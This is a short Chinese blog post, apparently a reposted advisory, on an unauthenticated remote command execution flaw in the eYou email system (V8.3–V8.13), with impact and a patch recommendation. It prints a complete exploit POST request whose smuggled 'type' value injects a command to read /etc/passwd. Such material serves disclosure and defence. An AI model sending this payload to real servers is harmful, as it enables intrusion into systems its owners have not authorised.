1、漏洞:亿邮电子邮件系统是北京亿中邮信息技术有限公司开发的一款面向中大型集团企业、政府、高校用户的国产邮件系统,未经身份验证的攻击者可以利用该漏洞,通过精心构造恶意请求,使用POST方法在目标服务器上执行命令,从而获取目标服务器权限,控制目标服务器。
2、影响范围:该漏洞影响亿邮电子邮件系统V8.3至V8.13的部分二次开发版本,信创版本及V8.13之后的版本不受影响。
(图片来源网络,侵删)
3、利用方式:攻击者可以通过发送特定的POST请求来利用此漏洞,通过以下请求:
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 Host: 127.0.0.1 Content-Length: 39 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 type='|cat /etc/passwd||'
可以执行cat /etc/passwd命令,获取服务器信息。
4、修复方案:建议用户联系厂商获取漏洞最新状态与补丁更新,亿邮公司已发布补丁程序,用户应及时安装补丁以修复此漏洞。
亿邮电子邮件系统的这一远程命令执行漏洞允许未经身份验证的攻击者在目标服务器上执行任意命令,从而获取服务器权限,该漏洞影响特定版本的亿邮电子邮件系统,用户应尽快联系厂商获取并安装补丁,以确保系统安全。
小伙伴们,上文介绍亿邮 漏洞的内容,你了解清楚吗?希望对你有所帮助,任何问题可以给我留言,让我们下期再见吧。
(图片来源网络,侵删)
(图片来源网络,侵删)
本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/70240.html
